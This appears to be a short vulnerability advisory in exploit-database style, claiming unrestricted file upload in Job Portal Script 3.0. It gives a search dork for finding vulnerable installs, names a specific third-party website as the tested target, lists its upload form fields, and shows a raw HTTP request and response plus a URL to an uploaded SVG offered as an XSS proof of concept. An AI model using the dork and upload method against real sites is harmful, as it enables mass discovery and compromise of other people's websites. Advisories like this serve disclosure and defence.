============================================================================================================================ | # Title : Job Portal Script version 3.0 Unrestricted file upload Vulnerability | | # Author : indoushka | | # email : indoushka4ever@gmail.com | | # Tested on : windows 10 Français V.(Pro) | | # Version : 3.0 | | # Vendor : http://www.jobportalscript.com/index.html | | # Dork : "categorysearch.php?indus=" | ============================================================================================================================ poc : [+] Dorking İn Google Or Other Search Enggine [+] use payload : email.php Form name: <empty> Form action: https://euthaliaglobal.com/email.php Form method: POST Form inputs: name [Text] job_title [Hidden] email [Text] contact [Text] location [Text] exp [Select] file [File] submit [Submit] Request GET /temp/AcuTest8194.htm HTTP/1.1 Cookie: PHPSESSID=bbuqivorna44vjae3njq8omie0; __cfduid=d80ba7f88b5acfa9d902195b7000ad5ef1516054661; __zlcmid=kUh369kQnxgPK6 Host: euthaliaglobal.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* Response HTTP/1.1 200 OK Date: Mon, 15 Jan 2018 22:41:35 GMT Server: Apache/2.4.7 (Ubuntu) Last-Modified: Mon, 15 Jan 2018 22:41:34 GMT ETag: "2c-562d850f7e0c6" Accept-Ranges: bytes Content-Length: 44 Keep-Alive: timeout=5, max=4 Connection: Keep-Alive Content-Type: text/html poc file upload xss : https://euthaliaglobal.com//temp/AcuTest8402.svg Greetz :---------------------------------------------------------------------------------------- | jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic | | ================================================================================================